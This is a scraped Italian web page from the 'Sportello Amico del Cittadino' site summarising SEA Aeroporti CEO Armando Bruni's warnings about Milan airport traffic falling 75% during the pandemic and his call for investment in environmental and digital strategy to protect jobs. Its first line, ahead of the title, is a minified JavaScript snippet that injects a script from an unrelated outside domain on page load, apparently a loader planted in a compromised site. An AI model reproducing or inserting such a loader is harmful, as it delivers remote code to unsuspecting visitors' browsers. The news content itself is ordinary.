;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Meno piste e terminal, più strategia e tutela: SEA chiede un aiuto mirato per salvare l’aeroportuale - Sportello Amico Del Cittadino
Nuove problematiche per SEA Aeroporti per il perdurare dell'emergenza sanitaria
Nuove problematiche per SEA Aeroporti per il perdurare dell'emergenza sanitaria

Meno piste e terminal, più strategia e tutela: SEA chiede un aiuto mirato per salvare l’aeroportuale

🔎 Il sito di informazione Malpensa24 ha raccolto la durissima testimonianza di Armando Bruni, amministratore delegato di SEA aeroporti, la società che gestisce gli scali milanesi, nell’ambito di un convegno organizzato da PwC (https://youtu.be/KSyPeALafNQ). Nella sua analisi, il ritorno ai volumi di traffico e servizio avverrà intorno al 2024, con gravi ripercussioni sul mondo del lavoro.

😞 Allo stato attuale, il sistema aeroportuale di Milano arriverà ad un calo del -75% a fine mese: SEA ha ribadito che la crisi del settore affligge non solo Alitalia, ma un intero comparto e auspica maggiori investimenti non per gli aspetti strutturali, quali piste, piazzali o terminal, ma destinati alla strategia ambientale e digitale che possa permettere agli scali di stare al passo con gli altri poli aeroportuali mondiali, cercando di salvaguardare l’occupazione.

🧐 Sportello Amico del Cittadino ha già raccolto molte testimonianze in questi mesi e segue con preoccupazione l’evolversi degli eventi. Siamo a disposizione per ascoltare e per aiutarvi in questo contesto difficile.
🖥 info@sportello-amico.it
📞 +39 0331 262045

Cerca anche

CORSI DI LAUREA

Essere audaci, ambiziosi, combattivi nel lavoro migliorando le proprie prospettive occupazionali è possibile.I Corsi di …

Dona il tuo 5x1000 ad Salesiani per il sociale
Scrivimi
Come posso aiutarti?
Buongiorno! 👋
i nostri uffici sono a vostra disposizione, chatta con noi !